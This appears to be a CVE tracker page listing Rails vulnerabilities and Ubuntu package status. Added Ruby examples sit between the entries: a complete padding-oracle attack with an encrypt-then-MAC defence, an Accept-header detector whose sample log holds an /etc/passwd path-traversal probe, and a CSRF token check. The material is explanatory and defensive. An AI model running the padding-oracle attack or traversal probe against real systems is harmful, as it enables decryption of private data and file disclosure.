Search CVE reports



61 – 70 of 150 results


CVE-2010-3299

Negligible priority
Ignored

The encrypt/decrypt functions in Ruby on Rails 2.3 are vulnerable to padding oracle attacks.

2 affected packages

rails, ruby-rails-2.3

Package 24.04 LTS 22.04 LTS 20.04 LTS 18.04 LTS
rails
ruby-rails-2.3
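The entry above says only that the Rails 2.3 encrypt/decrypt helpers were open to a padding oracle. The following is an added, self-contained example (not Rails code and not from the tracker) showing what that means in practice: a CBC decrypt that raises on bad padding hands an attacker a one-bit oracle, and that oracle is enough to recover plaintext block by block; an encrypt-then-MAC wrapper that checks the tag before touching the ciphertext closes it. Keys, function names and the sample plaintext are assumptions for the demo.

```ruby
require "openssl"
require "securerandom"

# Constructed keys for the demo; a real deployment derives them from a secret.
ENC_KEY = SecureRandom.random_bytes(32)
MAC_KEY = SecureRandom.random_bytes(32)
BLOCK   = 16

# AES-256-CBC with PKCS#7 padding; returns iv || ciphertext.
def cbc_encrypt(plaintext)
  c = OpenSSL::Cipher.new("aes-256-cbc").encrypt
  c.key = ENC_KEY
  iv = c.random_iv
  iv + c.update(plaintext) + c.final
end

# Vulnerable pattern: decrypt without authenticating first. OpenSSL raises
# CipherError on bad padding, and that distinguishable failure is the oracle.
def cbc_decrypt_unauthenticated(blob)
  c = OpenSSL::Cipher.new("aes-256-cbc").decrypt
  c.key = ENC_KEY
  c.iv = blob[0, BLOCK]
  c.update(blob[BLOCK..]) + c.final
end

# What the attacker observes: was the padding accepted or not?
def padding_ok?(blob)
  cbc_decrypt_unauthenticated(blob)
  true
rescue OpenSSL::Cipher::CipherError
  false
end

# Recover one plaintext block from (prev, target) with at most 256 oracle
# queries per byte. Returns nil if the oracle never answers "valid", which is
# exactly what happens against the authenticated API below.
def recover_block(prev, target, oracle)
  inter = Array.new(BLOCK, 0)              # AES_decrypt(target), learned byte by byte
  (BLOCK - 1).downto(0) do |pos|
    pad = BLOCK - pos
    forged = Array.new(BLOCK, 0)
    ((pos + 1)...BLOCK).each { |j| forged[j] = inter[j] ^ pad }
    hit = (0...256).find do |guess|
      forged[pos] = guess
      next false unless oracle.call(forged.pack("C*") + target)
      next true unless pos == BLOCK - 1
      # Last byte only: rule out an accidental 0x02 0x02 (or longer) padding
      # match by flipping the byte before it and asking again.
      check = forged.dup
      check[BLOCK - 2] ^= 0xff
      oracle.call(check.pack("C*") + target)
    end
    return nil if hit.nil?
    inter[pos] = hit ^ pad
  end
  prev.bytes.zip(inter).map { |p, i| p ^ i }.pack("C*")
end

def strip_pkcs7(pt)
  n = pt.bytes.last
  return nil if n.nil? || n < 1 || n > BLOCK || pt.bytes.last(n).uniq != [n]
  pt[0...-n]
end

# Full attack: walk the block pairs (iv, c1), (c1, c2), ... and unpad.
def padding_oracle_attack(blob, oracle)
  return nil unless blob.bytesize >= 2 * BLOCK && (blob.bytesize % BLOCK).zero?
  blocks = blob.bytes.each_slice(BLOCK).map { |b| b.pack("C*") }
  plain = "".b
  blocks.each_cons(2) do |prev, target|
    block = recover_block(prev, target, oracle)
    return nil if block.nil?
    plain << block
  end
  strip_pkcs7(plain)
end

# Hardened pattern: encrypt-then-MAC, compare the tag in constant time, and
# return the same nil for a bad tag and a bad decrypt so nothing leaks.
def encrypt_then_mac(plaintext)
  body = cbc_encrypt(plaintext)
  body + OpenSSL::HMAC.digest("SHA256", MAC_KEY, body)
end

def secure_compare(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).inject(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

def decrypt_authenticated(blob)
  return nil if blob.bytesize < 2 * BLOCK + 32
  body, tag = blob[0...-32], blob[-32..]
  return nil unless secure_compare(OpenSSL::HMAC.digest("SHA256", MAC_KEY, body), tag)
  cbc_decrypt_unauthenticated(body)
rescue OpenSSL::Cipher::CipherError
  nil
end

if __FILE__ == $PROGRAM_NAME
  secret = "attack at dawn!!"
  p padding_oracle_attack(cbc_encrypt(secret), method(:padding_ok?))
  p padding_oracle_attack(encrypt_then_mac(secret), ->(b) { !decrypt_authenticated(b).nil? })
end
```

The attack needs nothing but the accept/reject signal, so any wrapper that distinguishes "bad padding" from "bad data" (by exception class, message, status code or timing) reopens the hole; verifying an HMAC over the whole ciphertext before decrypting removes the signal entirely.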

CVE-2019-5420

Medium priority
Ignored

A remote code execution vulnerability in development mode Rails <5.2.2.1, <6.0.0.beta3 can allow an attacker to guess the automatically generated development mode secret token. This secret token can be used in combination with...

7 affected packages

rails, rails-4.0, ruby-actionpack-3.2, ruby-activemodel-3.2, ruby-activerecord-3.2...

Package 24.04 LTS 22.04 LTS 20.04 LTS 18.04 LTS
rails Not affected
rails-4.0 Not in release
ruby-actionpack-3.2 Not in release
ruby-activemodel-3.2 Not in release
ruby-activerecord-3.2 Not in release
ruby-activesupport-3.2 Not in release
ruby-rails-3.2 Not in release

CVE-2019-5419

Medium priority
Vulnerable

There is a possible denial of service vulnerability in Action View (Rails) <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 where specially crafted Accept headers can cause Action View to consume 100% CPU and make the server unresponsive.

7 affected packages

rails-4.0, ruby-actionpack-3.2, ruby-activemodel-3.2, ruby-activerecord-3.2, ruby-activesupport-3.2...

Package                  24.04 LTS        22.04 LTS        20.04 LTS        18.04 LTS
rails-4.0                Not in release   Not in release   Not in release   Not in release
ruby-actionpack-3.2      Not in release   Not in release   Not in release   Not in release
ruby-activemodel-3.2     Not in release   Not in release   Not in release   Not in release
ruby-activerecord-3.2    Not in release   Not in release   Not in release   Not in release
ruby-activesupport-3.2   Not in release   Not in release   Not in release   Not in release
rails                    Not affected     Not affected     Not affected     Vulnerable
ruby-rails-3.2           Not in release   Not in release   Not in release   Not in release

CVE-2019-5418

High priority

Some fixes available 2 of 4

There is a File Content Disclosure vulnerability in Action View <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 and v3 where specially crafted accept headers can cause contents of arbitrary files on the target system's filesystem to be exposed.

7 affected packages

rails, rails-4.0, ruby-actionpack-3.2, ruby-activemodel-3.2, ruby-activerecord-3.2...

Package                  24.04 LTS        22.04 LTS        20.04 LTS        18.04 LTS
rails                    Not affected     Not affected     Not affected     Fixed
rails-4.0                Not in release   Not in release   Not in release   Not in release
ruby-actionpack-3.2      Not in release   Not in release   Not in release   Not in release
ruby-activemodel-3.2     Not in release   Not in release   Not in release   Not in release
ruby-activerecord-3.2    Not in release   Not in release   Not in release   Not in release
ruby-rails-3.2           Not in release   Not in release   Not in release   Not in release
ruby-activesupport-3.2   Not in release   Not in release   Not in release   Not in release
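Both CVE-2019-5419 and CVE-2019-5418 above are triggered through "specially crafted accept headers", so while the fix is the upgrade, a detection rule on the Accept value gives operations a way to spot probing in logs and to reject junk at the edge on hosts still marked Vulnerable. The block below is an added example, not Rails or tracker code: it checks each media range against a loose grammar, flags path-like sequences that never belong in a media range, flags oversized headers, and runs over constructed key=value log lines. The log format, thresholds and client addresses are assumptions for the demo.

```ruby
# Loose grammar for one media range: type/subtype plus optional ;key=value params.
MEDIA_RANGE = %r{\A[A-Za-z0-9!#$&^_.+*-]+/[A-Za-z0-9!#$&^_.+*-]+(?:\s*;\s*[A-Za-z0-9_-]+=[^;,]*)*\z}
# Sequences that never appear in a legitimate media range and look like file-path probing.
PATH_PROBE  = %r{\.\.[/\\]|\A/|\{\{|\x00}

MAX_RANGES = 20    # assumed thresholds; tune to what your clients really send
MAX_BYTES  = 1024

# Returns a list of findings for one Accept header value; [] means it looks normal.
def classify_accept(value)
  findings = []
  ranges = value.split(",").map(&:strip)
  ranges.each do |r|
    findings << :path_probe if r.match?(PATH_PROBE)
    findings << :malformed  unless r.match?(MEDIA_RANGE)
  end
  findings << :oversized if ranges.size > MAX_RANGES || value.bytesize > MAX_BYTES
  findings.uniq
end

# Constructed sample log lines (key=value style, not any real server's format).
SAMPLE_LOG = [
  'ts=2019-03-13T10:00:01Z client=203.0.113.5 method=GET path=/reports/3 accept="text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"',
  'ts=2019-03-13T10:00:02Z client=198.51.100.7 method=GET path=/reports/3 accept="../../../../../../etc/passwd{{"',
  'ts=2019-03-13T10:00:03Z client=203.0.113.9 method=GET path=/api/items accept="application/json"',
  'ts=2019-03-13T10:00:04Z client=198.51.100.7 method=GET path=/search accept="' + Array.new(200, "a/b").join(",") + '"',
].freeze

# key=value or key="quoted value" pairs into a Hash; quotes are stripped.
def parse_line(line)
  line.scan(/(\w+)=("[^"]*"|\S+)/).to_h.transform_values do |v|
    v.delete_prefix('"').delete_suffix('"')
  end
end

# [client, path, findings] for every line whose Accept header is suspicious.
def scan_log(lines)
  lines.map do |line|
    f = parse_line(line)
    findings = classify_accept(f.fetch("accept", ""))
    [f["client"], f["path"], findings] unless findings.empty?
  end.compact
end

if __FILE__ == $PROGRAM_NAME
  scan_log(SAMPLE_LOG).each { |client, path, findings| puts "#{client} #{path} #{findings.join(',')}" }
end
```

Use the :path_probe finding as a high-confidence alert and :malformed / :oversized as lower-confidence signals, since odd but harmless clients exist; the same `classify_accept` can sit in a Rack middleware to return 406 before Action View parses the header, as defense in depth rather than a substitute for the patched version.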

CVE-2018-16477

Medium priority
Not affected

A bypass vulnerability in Active Storage >= 5.2.0 for Google Cloud Storage and Disk services allows an attacker to modify the `content-disposition` and `content-type` parameters, which can be used with HTML files and have them...

7 affected packages

rails-4.0, ruby-activemodel-3.2, rails, ruby-actionpack-3.2, ruby-activerecord-3.2...

Package 24.04 LTS 22.04 LTS 20.04 LTS 18.04 LTS
rails-4.0 Not in release
ruby-activemodel-3.2 Not in release
rails Not affected
ruby-actionpack-3.2 Not in release
ruby-activerecord-3.2 Not in release
ruby-activesupport-3.2 Not in release
ruby-rails-3.2 Not in release

CVE-2018-16476

Medium priority
Vulnerable

A Broken Access Control vulnerability in Active Job versions >= 4.2.0 allows an attacker to craft user input which can cause Active Job to deserialize it using GlobalId and give them access to information that they should not...

7 affected packages

rails, ruby-rails-3.2, ruby-actionpack-3.2, ruby-activerecord-3.2, ruby-activesupport-3.2...

Package                  24.04 LTS        22.04 LTS        20.04 LTS        18.04 LTS
rails                    Not affected     Vulnerable       Vulnerable       Vulnerable
ruby-rails-3.2           Not in release   Not in release   Not in release   Not in release
ruby-actionpack-3.2      Not in release   Not in release   Not in release   Not in release
ruby-activerecord-3.2    Not in release   Not in release   Not in release   Not in release
ruby-activesupport-3.2   Not in release   Not in release   Not in release   Not in release
ruby-activemodel-3.2     Not in release   Not in release   Not in release   Not in release
rails-4.0                Not in release   Not in release   Not in release   Not in release

CVE-2018-3779

High priority
Ignored

The active-support ruby gem 5.2.0 contains a malicious backdoor that could allow a remote attacker to execute arbitrary code on the system.

7 affected packages

rails, rails-4.0, ruby-actionpack-3.2, ruby-activemodel-3.2, ruby-activerecord-3.2...

Package 24.04 LTS 22.04 LTS 20.04 LTS 18.04 LTS
rails Not affected
rails-4.0 Not in release
ruby-actionpack-3.2 Not in release
ruby-activemodel-3.2 Not in release
ruby-activerecord-3.2 Not in release
ruby-activesupport-3.2 Not in release
ruby-rails-3.2 Not in release

CVE-2016-10522

Medium priority
Vulnerable

rails_admin ruby gem <v1.1.1 is vulnerable to cross-site request forgery (CSRF) attacks. Non-GET methods were not validating CSRF tokens and, as a result, an attacker could hypothetically gain access to the...

1 affected package

ruby-rails-admin

Package                  24.04 LTS        22.04 LTS        20.04 LTS        18.04 LTS
ruby-rails-admin         Not in release   Not in release   Not in release   Vulnerable
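The CVE-2016-10522 entry says rails_admin did not validate CSRF tokens on non-GET methods. The block below is an added example (not rails_admin or Rails code) of the policy that check enforces: a per-session token, required on every state-changing method, compared in constant time, and a simulated dispatch that refuses the request before any handler runs. In a Rails app the same behaviour comes from `protect_from_forgery with: :exception`; the session hash, parameter and header names here follow Rails' conventions but the functions are assumptions for the demo.

```ruby
require "securerandom"

SAFE_METHODS = %w[GET HEAD OPTIONS].freeze

# One token per session, created lazily and reused for the session's lifetime.
def csrf_token_for(session)
  session[:csrf_token] ||= SecureRandom.urlsafe_base64(32)
end

# Constant-time comparison so a forged token cannot be matched byte by byte.
def secure_compare(a, b)
  return false if a.nil? || b.nil? || a.bytesize != b.bytesize
  a.bytes.zip(b.bytes).inject(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# The rule rails_admin skipped: every request whose method can change state
# must present the session's token, as the authenticity_token form field or
# the X-CSRF-Token header. Safe methods pass because they must not mutate.
def csrf_verified?(session, method, params: {}, headers: {})
  return true if SAFE_METHODS.include?(method.to_s.upcase)
  expected = session[:csrf_token]
  return false if expected.nil?                       # no session token issued yet
  submitted = params["authenticity_token"] || headers["X-CSRF-Token"]
  secure_compare(expected, submitted)
end

# Simulated dispatch: the check runs before the handler, like a before_action.
def dispatch(session, method, path, params: {}, headers: {})
  unless csrf_verified?(session, method, params: params, headers: headers)
    return [403, "CSRF token missing or invalid for #{method.upcase} #{path}"]
  end
  [200, "#{method.upcase} #{path} handled"]
end

if __FILE__ == $PROGRAM_NAME
  session = {}
  token = csrf_token_for(session)
  p dispatch(session, "POST", "/admin/users/1")                                        # cross-site form: 403
  p dispatch(session, "POST", "/admin/users/1", params: { "authenticity_token" => token })
  p dispatch(session, "DELETE", "/admin/users/1", headers: { "X-CSRF-Token" => token })
end
```

The check only protects what it covers: a route that mutates state on GET is outside SAFE_METHODS' promise and stays exploitable no matter how strict the token check is, which is why the fix for an admin UI is both validating tokens on non-GET methods and keeping GET handlers read-only.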

CVE-2018-3741

Medium priority
Vulnerable

There is a possible XSS vulnerability in all rails-html-sanitizer gem versions below 1.0.4 for Ruby. The gem allows non-whitelisted attributes to be present in sanitized output when input with specially-crafted HTML fragments, and...

1 affected package

ruby-rails-html-sanitizer

Package                  24.04 LTS        22.04 LTS        20.04 LTS        18.04 LTS
ruby-rails-html-sanitizer Not affected    Not affected     Not affected     Not affected

CVE-2017-12098

Medium priority
Vulnerable

An exploitable cross site scripting (XSS) vulnerability exists in the add filter functionality of the rails_admin rails gem version 1.2.0. A specially crafted URL can cause an XSS flaw resulting in an attacker being able to...

1 affected package

ruby-rails-admin

Package                  24.04 LTS        22.04 LTS        20.04 LTS        18.04 LTS
ruby-rails-admin         Not in release   Not in release   Not in release   Vulnerable